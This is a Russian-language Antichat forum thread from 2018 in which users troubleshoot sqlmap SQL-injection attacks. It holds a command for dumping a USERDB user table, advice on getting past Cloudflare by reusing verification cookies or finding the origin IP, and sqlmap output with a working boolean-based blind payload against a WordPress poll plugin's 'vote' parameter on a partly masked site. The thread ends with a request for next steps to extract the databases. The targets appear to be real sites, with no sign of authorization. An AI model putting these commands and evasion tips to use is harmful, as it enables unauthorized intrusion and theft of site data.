HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.01.2018, 15:55
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от akv84  
akv84 said:

Добрый день,
Не могу получить дамп к нужной таблицы в SQLite:
команда: sqlmap -r request.txt -p Param --dbms=sqlite --force-ssl -D SQLite_db -T USERDB --dump
На выходе получаем:
[INFO] retrieved: CREATE TABLE USERDB ( OID
[WARNING] unable to enumerate the columns for table 'USERDB' in database 'SQLite_db'
Некоторые таблицы получаю без проблем в этой же базе.
Может есть смысл не всю таблицу дампить, а определенные колонки например
 
Ответить с цитированием

  #2  
Старый 18.01.2018, 16:09
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно
 
Ответить с цитированием

  #3  
Старый 18.01.2018, 19:07
akv84
Guest
Сообщений: n/a
Провел на форуме:
596

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Может есть смысл не всю таблицу дампить, а определенные колонки например
Колонки не выводит, все тоже самое: "unable to enumerate the columns"

Цитата:
Сообщение от t0ma5  
t0ma5 said:

в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно
Спасибо!
 
Ответить с цитированием

  #4  
Старый 19.01.2018, 03:05
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно
Точно, точно. Не думал что sql крутит sqlite
 
Ответить с цитированием

  #5  
Старый 27.01.2018, 13:17
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию

Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него

[12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)

[12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
 
Ответить с цитированием

  #6  
Старый 27.01.2018, 14:27
dmax0fw
Guest
Сообщений: n/a
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от Xsite  
Xsite said:

Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него
[12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
[12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
попробуй вручную пройти верификацию в браузере, cloudflare присвоит тебе куки, затем передай эти куки в sqlmap
 
Ответить с цитированием

  #7  
Старый 27.01.2018, 14:33
ekaterina333
Guest
Сообщений: n/a
Провел на форуме:
3180

Репутация: 0
По умолчанию

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

попробуй вручную пройти верификацию в браузере, cloudflare присвоит тебе куки, затем передай эти куки в sqlmap
не поможет думаю там в другом проблема
 
Ответить с цитированием

  #8  
Старый 27.01.2018, 14:34
ShpillyWilly
Guest
Сообщений: n/a
Провел на форуме:
27718

Репутация: 0
По умолчанию

Цитата:
Сообщение от Xsite  
Xsite said:

Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него
[12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
[12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
попробуй узнать реальный ip и его уже дергать. /threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/
 
Ответить с цитированием

  #9  
Старый 27.01.2018, 15:27
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию

Цитата:
Сообщение от ShpillyWilly  
ShpillyWilly said:

попробуй узнать реальный ip и его уже дергать.
/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/
первое что делал , пытался узнать айпи

но безрезультатно
 
Ответить с цитированием

  #10  
Старый 27.01.2018, 23:26
Golfstream
Guest
Сообщений: n/a
Провел на форуме:
757

Репутация: 0
По умолчанию

[22:12:44] [WARNING] the web server responded with an HTTP error code (424) whic

h could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: vote (POST)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: wp-polls-nonce=08fc675d54&vote=-6688) OR 8053=8053-- GHAp&poll_3=8&

poll_3=9&poll_3=10&archive-dropdown=http://*****.**/2014/05/&poll_id=3

---

[22:12:44] [INFO] the back-end DBMS is Microsoft SQL Server

back-end DBMS: Microsoft SQL Server 2016

[22:12:44] [INFO] fetching database names

[22:12:44] [INFO] fetching number of databases

[22:12:46] [INFO] retrieved:

[22:12:46] [ERROR] unable to retrieve the number of databases

[22:12:46] [INFO] retrieving the length of query output

[22:12:46] [INFO] retrieved:

[22:12:47] [INFO] retrieved:

[22:12:47] [INFO] falling back to current database

[22:12:47] [INFO] fetching current database

[22:12:47] [INFO] retrieving the length of query output

[22:12:47] [INFO] retrieved:

[22:12:48] [INFO] retrieved:

[22:12:48] [CRITICAL] unable to retrieve the database names

[22:12:48] [WARNING] HTTP error codes detected during run:

424 (?) - 24 times

подскажите дальнейшие действия, может команды какойто не хватает? блокируется бд. Тамперы юзал, но толка нет
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ